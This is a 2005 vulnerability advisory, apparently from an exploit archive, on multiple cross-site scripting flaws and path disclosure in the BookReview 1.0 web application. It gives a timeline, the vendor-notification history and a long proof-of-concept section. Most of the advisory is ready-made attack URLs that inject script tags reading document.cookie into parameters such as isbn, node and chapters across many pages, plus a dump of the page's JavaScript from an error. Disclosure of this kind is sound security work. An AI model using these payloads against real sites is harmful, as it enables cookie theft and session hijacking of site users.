bookreviewXSS.txt

bookreviewXSS.txt: Posted Aug 14, 2005; Authored by Lostmon; BookReview 1.0 is susceptible to multiple cross site scripting flaws.; tags | exploit, xss; SHA-256 | 18b1301ed5452fdb6ef81f18d76a51f4d9525dfc0f5a7e56dfda44f95f976cf7; Download | Favorite | View

bookreviewXSS.txt

###################################################
BookReview 1.0 multiple variable XSS
vendor url:http://www.readersunite.com
advisore:http://lostmon.blogspot.com/2005/05/
bookreview-10-multiple-variable-xss.html
vendor notify: yes exploit available: yes
###################################################

BookReview contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the 
application does not validate multiple variables upon
submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute 
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.



############
versions:
############

BookReview beta 1.0 vulnerable.


##############
solution
##############

no solutions was available at this time


###########
timeline
###########

discovered: 27 april 2005
vendor notify 17 may 2005 (webform)
disclosure: 26 may 2005



##################
proof of concepts
###################
all files are submitted to 'index.php' script by variable 'page' like 
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]
the name of module can be 'add_review' 'add_contents' or others

for example this url:
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25

is the same of this :

http://[victim]/add_contents&isbn=083081423X&chapters=25

with this if you think we have two ways for exploiting this situation
, one with the index.php and other directly by the module.

##################
add_review.htm
#################

http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true

http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true

http://[victim]/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true

http://[victim]/add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)</script>

###################
index.php
###################

http://[victim]/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25

http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

NICE ERROR !!


; function tallyup() { var count = 0; var book = 0; var part = 0; var
section = 0; var chapter = 0; var appendix = 0; var main_prefix = "";
var section_prefix = ""; for ( i=0; i var persian = '' + value; var
roman=""; var ronumdashes=""; var buffer=10-persian.length; while
(buffer>0) {persian="0"+persian;buffer--} var units=new
Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new
Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var
hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM");
var thousands=new
Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var
billionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes=billionsdashes[persian.substring(0,1)]; var
hundredmillionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var
tenmillionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes+=tenmillionsdashes[persian.substring(2,3)]; var
millionsdashes=new
Array("","_","__","___","_=","=","=_","=__","=___","_=");
romandashes+=millionsdashes[persian.substring(3,4)]; var
hundredthousandsdashes=new
Array("","_","__","___","__","_","__","___","____","__");
romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var
tenthousandsdashes=new
Array("","_","__","___","__","_","__","___","____","__");
romandashes+=tenthousandsdashes[persian.substring(5,6)]; var
thousandsdashes=new Array("","","",""," _","_","_","_","_"," _");
romandashes+=thousandsdashes[persian.substring(6,7)];
roman=thousands[persian.substring(0,1)];
roman+=hundreds[persian.substring(1,2)];
roman+=tens[persian.substring(2,3)];
roman+=thousands[persian.substring(3,4)];
roman+=hundreds[persian.substring(4,5)];
roman+=tens[persian.substring(5,6)];
roman+=thousands[persian.substring(6,7)];
roman+=hundreds[persian.substring(7,8)];
roman+=tens[persian.substring(8,9)];
roman+=units[persian.substring(9,10)]; return roman; } function
alphabetise(number) { return String.fromCharCode(64+number); } ///
function submitconfirm() { var agree =
document.getElementById('agree'); if ( !agree.checked ) { alert("You
must indicate your agreement to the terms and conditions by checking
the box provided."); return false; } return true; }


###################
add_contents.htm
###################


http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#########################
others.
#########################

http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author

http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels

http://[victim]/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT>

############################
posible local fle inclusion
############################

http://[victim]/suggestions/"><script>alert(document.cookie)</script>.htm
http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm

http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author



################
path disclosure:
################

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=auth
or

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title


######################## €nd ########################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Top Authors In Last 30 Days

Red Hat 228 files
indoushka 159 files
Jay Turla 150 files
Ubuntu 65 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

bookreviewXSS.txt

bookreviewXSS.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

bookreviewXSS.txt

Share This

bookreviewXSS.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems